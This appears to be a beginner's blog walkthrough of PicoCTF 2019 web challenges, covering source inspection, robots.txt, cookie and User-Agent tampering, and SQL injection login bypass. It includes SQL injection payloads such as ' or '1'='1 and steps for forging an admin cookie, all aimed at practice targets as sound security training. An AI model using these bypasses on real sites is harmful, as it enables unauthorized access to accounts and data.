Loading...
Blog Featured Image

PICOCTF 2019

!!
IF YOU ARE A BEGGINNER PLEASE DON'T GO STRAIGHT TO THE ANSWER/FLAG. Try to understand how everything works... because after all what matters is the knowledge acquired

!!

Insp3ct0r

So this first challange is pretty simple. We got our first hint in the name of the chall itself "Insp3ct0r". So that tells us that we should inspect the website. As you may know, there is a tool in most browsers called "Inspector"... So basicly all we have to do here is look a bit through the HTML, CSS and JS files that are being included on the website.

If you want to try it for yourself, don't read any further, press F12 and start "insp3ct1ng" ;)

We can find the first part of the flag in the html like so

So we know that there are 2 other parts somewhere... lets check the included files. As we can see by the following screenshot, there are 2 css files being included "css.css" and "mycss.css" Lets open them and see whats in there!

Now only Javascript is left... look, there is only 1 .js file being included called myjs.js! how convinient :p
And there is the 3rd part of the flag!


dont-use-client-side

This is a funny one! Okay so... we've got what seems to be a "secure login portal". If we inspect the form, we can see that it is POSTing data on itself and the page itself is html... what does that mean? It means that this has to do something with javascript... Let's inpect the page's source code.

Alright, we found this piece of JS code

We can see on the line 11 that it is going to grab our input and is going to compare it to a bunch of IFs.
All we have to do now is follow the order from substring(0 to (32 or 4*8 or split*8))


logon

This being the third web challange, we can't expect it to be as easy as the second one right? So this time we've got a Login system. If we press "Sign In" without adding any input it says that we are logged in (somehow) but we are not able to see the flag... so this has to be a cookie challenge.(Not sure how cookies work? learn more here)

There are two ways to solve this... you could either use the developer tools (which is included in most browers) to edit the http requests or you could use a tool like BurpSuit. (If you don't know how to use Burpsuit, you should watch this tutorial)

Using the Dev Tools is pretty simple... Go on the Network Tab, and you should have listed a GET request on "flag" just like shown bellow.
Click on it and on the right side, you should have a button saying "Edit and Resend", click on it. Look for the cookie called , surprisingly, "admin" and change it from "False" to "True". After that click on the small button "Send". After that you should have a new request on the list, click it, go on the response tab, scroll a little bit and you should find the flag there!


where are the robots

This is a challenge to test your overall knowledge on websites.
The name for this challange already gives the solution away. Here is some knowledge that might help you solve this before I spoil it for you.

"Web Robots (also known as Web Wanderers, Crawlers, or Spiders), are programs that traverse the Web automatically. Search engines such as Google use them to index the web content, spammers use them to scan for email addresses, and they have many other uses."
So... basicly its common to have a "robots.txt" file in the root of the domains... Lets check if there is such file on this website

Seems like there is! Let's try opening it!


client-side again

So... it looks like we have an upgraded version of "Don't Use Client Side". As we inspect the page, we notice a huge string inside a script tag.
Basicly this is thing called obfuscation.(learn more here) If we look closely, we don't even have to de-obfuscate it... look at all these pieces of the flag here ;)


open to admins

Before we even get to the challenge itself, we are given this information:

"This secure website allows users to access the flag only if they are admin and if the time is exactly 1400."
Well... this should be easy... Let's intercept the request as we press the big green flag button.
We have to set the admin cookie to True . Let's also add Time=1400 just like they told us


Nice! We got the flag!


picobrowser

We are presented with another big green button, let's click it to see what happens.
Alright, we got the following message

You're not picobrowser! Mozilla/5.0 *********
Well... how do they know I am using Mozzila and not picobrowser? If you've studied HTTP Headers, you will know one specific header which will send your browsers information and that is User-Agent
Let's intercept the HTTP Request as we click on the button and let's tell them that we are picobrowser instead of Mozzila
and there we go! we got the flag!


Irish-Name-Repo 1

On this challange we are finally introduced to SQL Injection. As you surf through the site you will come up with a Login page (login.php) If you enter dummy data it will return as "login failed" which tells us that there is in fact a validation. Lets intercept the http request just like we did on the previous challange.
Okay... interesting... there is a "debug" field being submitted... What happens if we replace the "0" by "1"?

Look! The query is exposed!

As you might know... login will only be successful if the query returns "true". If we don't know the correct credentials, how are we able to make it return true?
Well.. this is where SQL Injection comes in. What would happen if we input our "pass" with something like ' or 1=1 ? (dont forget to change debug to 1) Try it yourself.

Whoa... why didn't it work you wonder... If you look carefuly at the query itself the syntax isnt right... there is a ' at the end which makes it return an internal error. So now we just have to "play around" with our payload until we write it the right way so it fits the syntax... which in this case would be something like ' or '1'='1 and voilĂ ! We got the flag!

Irish-Name-Repo 2

So... we've got an upgraded version of the previous challenge. If we try the same payload it will say "SQLi Detected".
This is the part where we have to figure out how they are filtering our input. It seems that they are filtering the password input and completely forgot about the username.


More Coming Soon...